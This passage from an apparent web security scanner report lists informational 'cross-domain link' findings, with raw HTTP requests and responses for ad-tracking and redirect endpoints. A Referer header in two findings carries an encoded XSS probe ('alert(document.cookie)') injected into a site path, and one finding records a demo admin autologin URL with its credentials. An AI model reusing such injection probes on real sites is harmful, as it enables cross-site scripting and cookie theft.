<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&amp;ei=GOOGLE_CONTENTNETWORK&amp;wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg" /></div>
<IFRAME SRC="http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?" WIDTH=120 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?">
<IMG SRC="http://ad.doubleclick.net/ad/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?" BORDER=0 WIDTH=120 HEIGHT=600 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME><IFRAME SRC='http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90' WIDTH=0 HEIGHT=0 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'></IFRAME>
...[SNIP]...

20.23. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:
  • http://cm.g.doubleclick.net/pixel?nid=bluekai&
The response contains the following link to another domain:
  • http://tags.bluekai.com/site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1&

Request

GET /pixel?nid=bluekai& HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Found
Location: http://tags.bluekai.com/site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1&
Date: Mon, 24 Jan 2011 21:07:10 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 277
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://tags.bluekai.com/site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&amp;cver=1&amp;">here</A>
...[SNIP]...

20.24. http://cm.g.doubleclick.net/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:
  • http://cm.g.doubleclick.net/pixel?nid=turn1
The response contains the following link to another domain:
  • http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=4&mpid=1051202&fpid=3&rnd=3797505172801460594&nu=n&sp=y
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESED6m9hESeuo-2i0GmZeSEfo&cver=1
Date: Tue, 25 Jan 2011 01:35:46 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&amp;pid=18&amp;uid=CAESED6m9hESeuo-2i0GmZeSEfo&amp;cver=1">here</A>
...[SNIP]...

20.25. http://cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The page was loaded from a URL containing a query string:
  • http://cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578
The response contains the following link to another domain:
  • http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http:/cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cms.ad.yieldmanager.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 22:31:00 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 411

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&amp;nwid=10000040578">here</A>
...[SNIP]...

20.26. http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.worldnow.com
Path:   /global/tools/video/WNVideoCodebase_v2.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js?ver=201010090400
The response contains the following link to another domain:
  • http://www.macromedia.com/go/getflash/

Request

GET /global/tools/video/WNVideoCodebase_v2.js?ver=201010090400 HTTP/1.1
Host: content.worldnow.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
WN: IIS27
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 11 Dec 2010 12:12:27 GMT
ETag: "803339ad2c99cb1:a79"
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 21:54:42 GMT
Date: Mon, 24 Jan 2011 21:54:42 GMT
Connection: close
Content-Length: 226851

if(!window.Silverlight)
{window.Silverlight={};}
Silverlight._silverlightCount=0;Silverlight.fwlinkRoot='http://go2.microsoft.com/fwlink/?LinkID=';Silverlight.onGetSilverlight=null;Silverlight.onSil
...[SNIP]...
;if(this.widgetClassType=="WNVideoCanvas"||this.widgetClassType=="WNGallery"||this.widgetClassType=="WNVideoCanvas2"||this.widgetClassType=="WNImageCanvas"||this.widgetClassType=="WNImageGallery"){f+='<a style="color:#333;text-decoration:none;" href="http://www.macromedia.com/go/getflash/" target="_blank">You need to download the latest version of flash player to use this player</a>
...[SNIP]...

20.27. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280
The response contains the following links to other domains:
  • http://ads.dailystar.com.lb/www/delivery/afr.php?zoneid=64&target=_blank&cb=658
  • http://ads.dailystar.com.lb/www/delivery/avw.php?zoneid=64&cb=658;n=acbb9396
  • http://ads.dailystar.com.lb/www/delivery/ck.php?n=acbb9396&cb=658

Request

GET /afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; OAVARS[a2bb8a70]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A528339%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121960%22%3B%7D; OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:21:31 GMT; path=/
Set-Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434140%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
Content-Length: 1287
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body>
<iframe id='a0157b25' name='a0157b25' src='http://ads.dailystar.com.lb/www/delivery/afr.php?zoneid=64&amp;target=_blank&amp;cb=658' frameborder='0' scrolling='no' width='728' height='90'><a href='http://ads.dailystar.com.lb/www/delivery/ck.php?n=acbb9396&amp;cb=658' target='_blank'><img src='http://ads.dailystar.com.lb/www/delivery/avw.php?zoneid=64&amp;cb=658;n=acbb9396' border='0' alt='' /></a>
...[SNIP]...

20.28. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280
The response contains the following link to another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:20:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
Set-Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
Content-Length: 1480
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

20.29. http://demo.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://demo.joomla.org/index.php?format=feed&type=rss
The response contains the following links to other domains:
  • http://demo16.cloudaccess.net/
  • http://demo16.cloudaccess.net/administrator/index.php?autologin=1&username=demo&password=demo
  • https://www.cloudaccess.net/my-cloud-panel.html

Request

GET /index.php?format=feed&type=rss HTTP/1.1
Host: demo.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; __utmb=228838275.1.10.1295835725;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:25:11 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:25:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 8770

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.5 - Open Source Content Management" -->
<?xml-stylesheet href="/plugins/system/jceutilities/css/jceutilities.css?v=224" type="text/css"
...[SNIP]...
<li><a class="backendLink" href="http://demo16.cloudaccess.net/administrator/index.php?autologin=1&username=demo&password=demo">See Backend</a>
...[SNIP]...
<li><a class="frontendLink" href="http://demo16.cloudaccess.net/">See Frontend</a>
...[SNIP]...
</a>. If you've registered already and need support, please <a title="submit a support ticket" id="z.:x" href="https://www.cloudaccess.net/my-cloud-panel.html">submit a support ticket</a>
...[SNIP]...

20.30. http://demo16.cloudaccess.net/administrator/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo16.cloudaccess.net
Path:   /administrator/index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://demo16.cloudaccess.net/administrator/index.php?autologin=1&username=demo&password=demo
The response contains the following links to other domains:
  • http://community.joomla.org/
  • http://community.joomla.org/translations.html
  • http://developer.joomla.org/
  • http://developer.joomla.org/security.html
  • http://docs.joomla.org/
  • http://extensions.joomla.org/
  • http://forum.joomla.org/
  • http://resources.joomla.org/
  • http://shop.joomla.org/
  • http://www.gnu.org/licenses/gpl-2.0.html
  • http://www.joomla.org/

Request

GET /administrator/index.php?autologin=1&username=demo&password=demo HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Set-Cookie: 3cd367566174a1f3a2f806869f69204d=qj4rsnti4a7bh3lrglpkp0bap3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<span class="logo"><a href="http://www.joomla.org" target="_blank"><img src="templates/bluestork/images/logo.png" alt="Joomla!" />
...[SNIP]...
<li><a class="icon-16-help-forum" href="http://forum.joomla.org" target="_blank" >Support Forum</a>
...[SNIP]...
<li><a class="icon-16-help-docs" href="http://docs.joomla.org" target="_blank" >Documentation Wiki</a>
...[SNIP]...
<li><a class="icon-16-help-jed" href="http://extensions.joomla.org" target="_blank" >Joomla Extensions</a>
...[SNIP]...
<li><a class="icon-16-help-trans" href="http://community.joomla.org/translations.html" target="_blank" >Joomla Translations</a>
...[SNIP]...
<li><a class="icon-16-help-jrd" href="http://resources.joomla.org" target="_blank" >Joomla Resources</a>
...[SNIP]...
<li><a class="icon-16-help-community" href="http://community.joomla.org" target="_blank" >Community Portal</a>
...[SNIP]...
<li><a class="icon-16-help-security" href="http://developer.joomla.org/security.html" target="_blank" >Security Center</a>
...[SNIP]...
<li><a class="icon-16-help-dev" href="http://developer.joomla.org" target="_blank" >Developer Resources</a>
...[SNIP]...
<li><a class="icon-16-help-shop" href="http://shop.joomla.org" target="_blank" >Joomla Shop</a>
...[SNIP]...
<p class="copyright">
           <a href="http://www.joomla.org">Joomla!&#174;</a> is free software released under the <a href="http://www.gnu.org/licenses/gpl-2.0.html">GNU General Public License</a>
...[SNIP]...

20.31. http://disqus.com/forums/integrations/twitter/tweetbox.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://disqus.com
Path:   /forums/integrations/twitter/tweetbox.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://disqus.com/forums/integrations/twitter/tweetbox.html?f=7newsboston
The response contains the following link to another domain:
  • http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1

Request

GET /forums/integrations/twitter/tweetbox.html?f=7newsboston HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1002


<!DOCTYPE html>

<html>
<head>
<meta charse="utf-8">
<title></title>

<script src="http://platform.twitter.com/anywhere.js?id=mAlbTY9QWAGj6rWXxK8xg&v=1">
</script>


<script src
...[SNIP]...

20.32. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The page was loaded from a URL containing a query string:
  • http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
The response contains the following links to other domains:
  • http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage
  • http://action.mathtag.com/mm/RSHA/red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n
  • http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47
  • http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?
  • http://ad.yieldmanager.com/pixel?id=1082184&t=2
  • http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2
  • http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1975009456
  • http://ib.adnxs.com/seg?add=65890&t=2
  • http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395
  • http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200
  • http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3
  • http://pixel.33across.com/ps/?pid=141&cgn=13888&seg=6770
  • http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221
  • http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&guid=ON&script=0

Request

GET /2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:14 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhaWoU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<!-- aol -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
<img src="http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1975009456" width="1" height="1" border="0"/>
<!-- Tribal -->
<img src='http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage' width='1' height='1' border='0'>
<!--ValueClick-->
<img src="http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200" width="1" height="1" border="0">
<!-- mmath -->
<img src="http://action.mathtag.com/mm//RSHA//red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n" width="1" height="1" />
<img src="http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2" width="1" height="1" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&amp;guid=ON&amp;script=0"/>
<img src="http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221" height="1" width="1" />
<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
<!--Begin DLX Pixel-->
...[SNIP]...
<!-- Media 6 -->
<img width="1" height="1" src="http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47" />
<!--ZAP IMP-->
...[SNIP]...
<!-- Segment Pixel ... RadioShack_General_Segment_RTG - DO NOT MODIFY -->
<img src="http://ib.adnxs.com/seg?add=65890&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<!-- 247 -->
<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3">
<!-- Advertiser 'Radio Shack', Include user in segment 'Radio Shack General RTG' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=1082184&t=2" width="1" height="1" />
<!-- End of segment tag -->
...[SNIP]...
<!-- Begin 33Across Tag -->
<img src="http://pixel.33across.com/ps/?pid=141&amp;cgn=13888&amp;seg=6770"style="visibility:hidden;width:1px;height:1px;">
<!-- End 33Across Tag -->

20.33. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1596198292@x23

Issue detail

The page was loaded from a URL containing a query string:
  • http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
The response contains the following links to other domains:
  • http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage
  • http://action.mathtag.com/mm/RSHA/red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n
  • http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47
  • http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?
  • http://ad.yieldmanager.com/pixel?id=1082184&t=2
  • http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2
  • http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1596989115
  • http://ib.adnxs.com/seg?add=65890&t=2
  • http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395
  • http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200
  • http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3
  • http://pixel.33across.com/ps/?pid=141&cgn=13888&seg=6770
  • http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221
  • http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&guid=ON&script=0

Request

GET /2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2584
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<!-- aol -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=radioshackpurchas_cs=1&betq=11660=423395" width = "1" height = "1" border = "0">
